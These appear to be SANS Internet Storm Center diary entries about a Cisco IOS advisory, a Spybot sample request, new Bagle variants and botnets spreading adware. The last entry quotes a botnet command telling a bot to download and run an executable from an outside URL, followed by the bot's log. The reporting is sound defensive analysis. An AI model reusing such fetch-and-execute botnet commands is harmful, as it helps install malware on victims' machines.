Cisco IOS Security Advisory
Today Cisco released an advisory regarding IOS Head-based Overflow Vulnerability in System Timers. It can be found here. Some users wrote to us asking about rush to upgrade the routers. In the words of one of our handlers, a brief explanation is that "this is related to the ipv6 vulnerability that cisco released patches for midyear AND the mike lynn black hat breifing which exploited that vulnerability and a timer vulnerability."
-------------------------------------------------------------
Handler on Duty: Pedro Bueno (pbueno //%// isc. sans. org)
Sample needed - of Spybot.ZIF, which scans for vulnerable Cisco Routers
If anyone catches a sample of this one please upload it through our contact page. Thanks!
Thanks to Jakob S for sending us the sample.
It's MD5 sum is:
2ec1fa5fca52b9c36bddea3511178882 svcdata.exe
so if you have a different sample let us know.
For what it's worth, Symantec detects this as W32.Spybot.ZIF while Kaspersky detects it as Backdoor.Win32.Rbot.adf.
Malware Analysis Quiz IV
If you missed the previous ones, it is still time to start...!:)
Check it here!
------------------------------------------------------------
Handler on Duty: Pedro Bueno ( pbueno //%// isc. sans. org)
6 bagle versions in 1 day
:"The Bagles are continuing to come in. We've detected 6 new variants so far, and just released an urgent update. The first 2 - 3 variants were agressively spammed. The others have been placed on sites and will be downloaded to victim machines. It's the latest move to keep the botnet up and running."
So, check your virus def and try to get the newest one asap.
--------------------------------------------------------------
Handler On Duty: Pedro Bueno ( pbueno //%// isc. sans. org)
Botnets and Adwares-Spywares connection
I am sure you already know about botnets, right? Ok, I am quite sure that you also know that one of the purposes of the botnets, besides all the nice stuff written by our Handler Mike Poor in his diary Big Business surrounding Internet Fraud , is to spread malware, right? Ok (again), today I would like to show you how the botnets are also spreading adware/spyware softwares. As the bot is remotely controlled by the botnet owner, it can do anything...
While investigating a bot today, I found this instruction to the bot:
:MySQL 332 USA|xxxxxxx #c :xdownload32 http://news-affairs.com/ysb.exe c:\ysb.exe 1
This instruction told to my bot to download the ysb.exe 'software' to my computer and open it, as the next messages can show:
#c :[DOWNLOAD]: Downloading URL: http://news-affairs.com/ysb.exe to: c:\ysb.exe.
#c :[DOWNLOAD]: Downloaded 67.3 KB to c:\ysb.exe @ 33.6 KB/sec.
#c :[DOWNLOAD]: Opened: c:\ysb.exe.
As soon as it downloaded it oppened it, this window came up:
This 'software' is recognized by some AV at VirusTotal as a downloader or ISTbar.
Nice points from the License Agreement:
9. OTHER SOFTWARE. You allow that third party software may be installed in the Software and the Integrated Search Technologies shall not be liable to anyone with respect to such third party software.
16. UPDATES. You grant Integrated Search Technologies permission to add/remove features and/or functions to the existing Software and/or Service, or to install new applications or third party software, at any time, in its sole discretion with or without your knowledge and/or interaction. By doing so, you agree to the terms of the new applications. You also grant Integrated Search Technologies permission to make any changes to the Software and/or Service provided at any time.
Ok, ok...old stuff, but always nice to know how these things suddenly appears in your computer...:)
------------------------------------------------------------------
Handler on Duty: Pedro Bueno
Comments